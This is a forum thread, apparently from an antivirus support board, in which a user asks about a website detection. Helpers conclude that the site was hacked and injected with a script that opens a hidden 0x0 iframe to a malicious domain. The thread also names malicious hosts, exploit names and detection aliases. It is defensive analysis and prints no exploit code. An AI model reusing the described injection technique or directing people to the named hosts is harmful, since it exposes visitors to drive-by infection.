False Positive in a Webpage

Hello, everyday i go to a page, and today avast! says that found a trojan ???

This is the page:
hxxp://www.sagastume.com/

This is the detection founded:
JS:ScriptIP-inf

I think that is a False positive cause it only detect something in that page after the today update ::slight_smile:

If you need more information only ask me

Thanks for the help :slight_smile:

Here I get an all clean:
http://scanner.novirusthanks.org/analysis/29227ba496bb1c8cfb1bf4b63a5fe7f2/aW5kZXg

The unpacker also gives benign results, only thing could be facebook issue…
I also get an avast alert here: wepawet.iseclab.org/view.php?hash=0f7dfbc7ee0ae445974788926dfb9ce7&t=1272751433&type=js:

polonus

Wepawet (alpha) - malicious
hxxp://wepawet.iseclab.org/view.php?hash=0f7dfbc7ee0ae445974788926dfb9ce7&t=1272751433&type=js

Hi Pondus,

There are some 75 variants of this malcode around
That wepawet link is giving an alert for JS-pdfka BT trojan threat aliases for Exploit.PDF-JS.Gen (v):
Alias
Detected by
Bloodhound.Exploit.196 Symantec
Exploit:Win32/Pidief.E Microsoft
VirTool:JS/Imbarligalgo.gen!A Microsoft
Virus.JS.Pdfka Ikarus
JS:Pdfka-BK Avast
Virus.JS.Pdfka!IK a-squared
JS:Pdfka-AG Avast
JS.Obfus-5 ClamAV
Troj/PDFJs-P Sophos
Exploit.PDF-JS.Gen GData
Troj/PDFJs-AH Sophos
Exploit.PDF-JS.Gen.C03 nProtect
Description here: http://www.bitdefender.com/VIRUS-1000487-en--Exploit.PDF-JS.Gen.html
Removal instructions: http://www.hkactivity.com/how-to-delete-exploit-pdf-js-gen/
Pondus, please, make the link non-clickable with hxtp or wXw

polonus

So, this is not a False Positive?

The Site was hacked?

My PC isn’t Infected right?

Thanks for the help :slight_smile:

The Script tag outside of the closing HTML tag is against standards and as such highly suspect.

See image, the script document . write line has been broken to make it easier to see.

This script creates a 0x0 iframe tag which points to a malicious site (grepad.com) and it is this script tag and associated attempt to connect to a malicious site that causes the alert, see image2.

No it isn’t an FP.
It looks like the site was hacked.
Your system shouldn’t be infected as avast blocked it.

Hi Light Archangel,

As you were alerted by the avast shield and it disconnected from the site, you are not infected.
Malicious software includes 7 exploit(s), 4 trojan(s) on the redirect site…
To be fully protected against all malcode that could enter a browser then use a browser like Firefox with the NoScript extension and RequestPolicy extension installed to have all these issues blocked and allow only that what you need when you visit a site,

polonus

This script creates a 0x0 iframe tag which points to a malicious site (grepad.com) and it is this script tag and associated attempt to connect to a malicious site that causes the alert, see image2.
And that site have this result Wepawet (alpha) - malicious hxxp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js

I’m using Firefox (Is my Default browser)
I have WOT + NoScript addons

I allowed the Scripts of that page because I went everyday to there. ::slight_smile:
this not happened yesterday…
For that reason i thought that was a False Positive.

avast protected very well my computer Then!! ;D

My PC is fine, I have no virus since I installed avast!
Now i’ll be looking for a similar site to sagastume.com

I’ll try to warn all my friends that used that site too…

Thanks to all for your replies.

So long my friends :wink:

Hi DavidR,

What malware do we detect for the grepad.com
link hxtp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js
I did not pass the above link directly, because avast would flag it…
Adobe util.printf overflow
Adobe getIcon
Office OCX OpenWebFile
AppStream LaunchObj
Hummingbird PerformUpdateAsync
Peachtree ExecutePreferredApplication
C6 propDownloadUrl

polonus

Yes, I tend not to get too carried away going to the next level down, etc. once it is reasonably clear that the site has been hacked/infected, etc. and the avast detection was good.

Hi DavidR,

This could also have given these results: http://stopbadware.org/reports/142c1e4fd471f4de9e6beea72b96fb17

polonus

Again I try to stick with what is actually on the site (where the detection was made) if that can determine the detection is good, life is too short for detailed delving once confirmed I stop.